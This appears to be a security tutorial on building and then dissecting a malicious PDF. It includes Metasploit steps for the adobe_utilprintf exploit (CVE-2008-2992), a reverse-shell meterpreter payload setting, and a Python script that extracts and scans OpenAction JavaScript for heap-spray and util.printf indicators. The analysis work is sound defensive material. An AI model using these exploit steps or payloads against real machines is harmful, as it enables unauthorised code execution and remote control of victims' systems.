PDF Stream Dumper: Infected PDF Analysis

PDF is an object-oriented format defined by Adobe. The format describes the organization of a document and preserves the dependencies the document needs (fonts, images, ...). These objects are stored within the document as streams, most of the time encoded or compressed. Below is the overview of a classic PDF document. For more information, please read Adobe's specifications.

We will create a fake PDF with Metasploit, containing an exploit attempt as well as a custom payload (the code to execute). The exploit targets a specific version of Adobe Reader, so we will need to do some archaeology and find an ancient Reader version (thanks to ) to install on the target machine. We will make an infected PDF that just opens the calculator (calc.exe) on the machine, for demonstration purposes.

Open a Metasploit console (installing Metasploit is not covered in this article) and type:

use exploit/windows/fileformat/adobe_utilprintf

Copy the file that has just been created (here /home/osboxes/.msf4/local/malicious.pdf) to a shared drive; you will need to get it onto your target machine.

On the target machine, download and install a vulnerable Adobe Reader version. The Metasploit module targets Reader 8.1.2; the bug it exploits, CVE-2008-2992 in util.printf, affects 8.1.2 and older and was fixed in 8.1.3, so anything newer will not work.

Once Reader is installed, open the malicious.pdf file. You should see a calculator spawned from the Adobe Reader process.

I've made another PDF with a slightly different payload, just for fun:

set PAYLOAD windows/meterpreter/reverse_tcp

Adobe Reader now carries a backdoor (a reverse shell) that connects back to the attacker and waits for commands.

Played enough! Let's see what's inside that malicious PDF and try to extract the malicious payload (we're still using the calc.exe PDF). First, we need a tool called PDF Stream Dumper, so download it. Load the malicious PDF with it and take some time to familiarize yourself with the tool.

We can start by checking whether the tool detects an exploit, using the "Exploit Scan" menu:

Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6

Indeed, there is an exploit hidden in stream 6 (the one in blue on the capture). But let's start at the beginning: when searching for exploits in a PDF, we most of the time encounter a heap spray created by JavaScript code. That heap spray pushes many copies of the payload onto the heap so that it is already in place, ready to be executed once the vulnerability has been triggered. If you open stream 1, you can see:

/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R

which we can translate as: the document's OpenAction points to object 5. Let's move to stream 5:

/Type/Action/S/JavaScript/JS 6 0 R

which says to execute the JavaScript located in stream 6.
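The object-graph walk just described (Catalog -> OpenAction -> Action with /S /JavaScript -> JS stream), as an added Python example; this is not code from the original article, from Metasploit or from PDF Stream Dumper. It builds a small constructed PDF with the same 1 -> 5 -> 6 layout, inflates the FlateDecode stream and runs a few indicator checks over the script (util.printf with an oversized width, %u-encoded unescape, a doubling heap-spray loop). The sample JavaScript, the object numbers and the indicator patterns are all assumptions made for the demonstration, and the splitter is a best-effort regex pass rather than a real PDF parser: object streams, incremental updates, a direct OpenAction dictionary or /JS given as a string are deliberately not handled, which is exactly the sort of thing malware relies on, so treat it as a triage aid, not a verdict.

```python
import re
import zlib

# Constructed sample JavaScript (an assumption for this demo, not the script
# Metasploit emits): a %u-encoded blob, a doubling heap-spray loop and a
# util.printf call with an oversized width like the CVE-2008-2992 trigger.
SAMPLE_JS = b"""\
var sc = unescape("%u9090%u9090");
var block = unescape("%u0c0c%u0c0c");
while (block.length < 0x40000) block += block;
var spray = [];
for (var i = 0; i < 200; i++) spray[i] = block + sc;
util.printf("%45000f", 1.2345e+300);
"""


def build_sample_pdf(js: bytes) -> bytes:
    """Minimal PDF with the article's layout: 1 (Catalog) -OpenAction-> 5 (Action) -JS-> 6 (stream)."""
    body = zlib.compress(js)
    objs = [
        b"<< /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 5 0 R >>",
        b"<< /Type /Outlines /Count 0 >>",
        b"<< /Type /Pages /Kids [4 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 3 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S /JavaScript /JS 6 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(body)
        + body + b"\nendstream",
    ]
    out = b"%PDF-1.4\n"
    for num, obj in enumerate(objs, 1):
        out += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


OBJ_RE = re.compile(rb"(\d+)\s+0\s+obj(.*?)endobj", re.S)
STREAM_START_RE = re.compile(rb"stream\r?\n")
# direct /Length only; an indirect '/Length 7 0 R' is skipped on purpose
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\d)(?!\s+\d+\s+R)")


def parse_objects(pdf: bytes) -> dict:
    """Best-effort split into {objnum: (dictionary_source, raw_stream_or_None)}.
    Good enough for a plain file; not a PDF parser (no xref, object streams
    or incremental updates)."""
    objects = {}
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(2)
        sm = STREAM_START_RE.search(body)
        if not sm:
            objects[num] = (body, None)
            continue
        dict_src = body[:sm.start()]
        lm = LENGTH_RE.search(dict_src)
        if lm:  # slice exactly /Length bytes after the stream keyword
            raw = body[sm.end():sm.end() + int(lm.group(1))]
        else:   # no usable /Length: fall back to the endstream keyword
            raw = body[sm.end():body.rfind(b"endstream")].rstrip(b"\r\n")
        objects[num] = (dict_src, raw)
    return objects


def ref(dict_src: bytes, key: bytes):
    """Object number behind an indirect reference such as '/OpenAction 5 0 R', or None."""
    m = re.search(rb"/" + re.escape(key) + rb"\s+(\d+)\s+0\s+R", dict_src)
    return int(m.group(1)) if m else None


def decode_stream(dict_src: bytes, raw: bytes) -> bytes:
    """Inflate FlateDecode streams; other filters are returned untouched."""
    return zlib.decompress(raw) if b"/FlateDecode" in dict_src else raw


def extract_openaction_js(pdf: bytes):
    """Walk Catalog -> OpenAction -> Action(/S /JavaScript) -> JS stream.
    Returns (objnum, script_text), or None when that chain is absent."""
    objects = parse_objects(pdf)
    catalog = next((n for n, (d, _) in objects.items()
                    if re.search(rb"/Type\s*/Catalog", d)), None)
    if catalog is None:
        return None
    action = ref(objects[catalog][0], b"OpenAction")  # direct << >> dict not handled
    if action not in objects:
        return None
    action_dict, _ = objects[action]
    if not re.search(rb"/S\s*/JavaScript", action_dict):
        return None
    js = ref(action_dict, b"JS")  # /JS given as a direct string is not handled
    if js not in objects or objects[js][1] is None:
        return None
    js_dict, raw = objects[js]
    return js, decode_stream(js_dict, raw).decode("latin-1")


# Cheap indicators of the pattern the article describes: a %u-encoded blob,
# a doubling loop that sprays it, and the vulnerable util.printf call.
INDICATORS = {
    "util.printf": re.compile(r"util\.printf\s*\("),
    "printf_large_width": re.compile(r'util\.printf\s*\(\s*"%\d{4,}'),
    "unescape_unicode": re.compile(r'unescape\s*\(\s*"%u'),
    "spray_loop": re.compile(r"while\s*\(.*\.length\s*<"),
}


def scan_js(js: str) -> dict:
    """Map each indicator name to whether it matched the script."""
    return {name: bool(rx.search(js)) for name, rx in INDICATORS.items()}


def main():
    pdf = build_sample_pdf(SAMPLE_JS)
    found = extract_openaction_js(pdf)
    if found is None:
        print("no OpenAction JavaScript chain found")
        return
    num, js = found
    print(f"OpenAction JavaScript lives in object {num}:\n{js}")
    for name, hit in scan_js(js).items():
        print(f"  {name:20s} {'FOUND' if hit else '-'}")


if __name__ == "__main__":
    main()
```

Running the block builds the sample, reports that the OpenAction script is object 6 and marks all four indicators as found. To point it at a real file, replace the sample bytes with the file's contents; when the chain is not found, remember that the absence of an OpenAction says nothing about /AA (additional actions) on pages or annotations, which the same walk can be extended to cover.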